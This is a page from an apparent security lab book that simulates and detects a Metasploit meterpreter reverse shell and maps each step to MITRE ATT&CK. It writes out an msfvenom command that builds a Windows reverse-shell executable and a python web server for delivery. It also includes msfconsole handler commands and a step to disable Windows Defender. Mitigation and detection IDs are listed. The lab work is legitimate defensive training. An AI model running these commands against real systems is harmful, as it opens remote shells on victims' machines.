Keyboard shortcuts

Press or to navigate between chapters

Press S or / to search in the book

Press ? to show this help

Press Esc to hide this help

We are simulating and detecting a basic Metasploit reverse_tcp shell while mapping it to the MITRE ATT&CK Framework.

Weaponization

TacticTechniqueSub Technique
TA0042: Resource DevelopmentT1587: Develop CapabilitiesT1587.001: Malware
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.30.100 LPORT=4444 -f exe > shell.exe

Delivery

TacticTechniqueSub Technique
TA0042: Resource DevelopmentT1608: Stage CapabilitiesT1608.001: Upload Malware
TA0011: Command and ControlT1105: Ingress Tool TransferNo sub-techniques

Disable Windows Defender, this is a basic shell.

python3 -m http.server 80

Pasted_image_20250610111426.png

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.30.100
set LPORT 4444
run

Exploitation

TacticTechniqueSub Technique
TA0002:ExecutionT1204:User ExecutionT1204.002: Malicious File
TA0011: Command and ControlT1095: Non-Application Layer ProtocolNo sub-techniques
T1571: Non-Standard PortNo sub-techniques
TA0007: DiscoveryT1082: System Information DiscoveryNo sub-techniques

Pasted_image_20250610112306.png

Detection

Pasted_image_20250615005857.png

Mitigations/Detections

IDMitigation
M1056Pre-compromise
M1040Behavior Prevention on Endpoint
M1038Execution Prevention
M1031Network Intrusion Prevention
M1021Restrict Web-Based Content
M1017User Training

IDDetectionData Component
DS0004Malware RepositoryMalware Content
Malware Metadata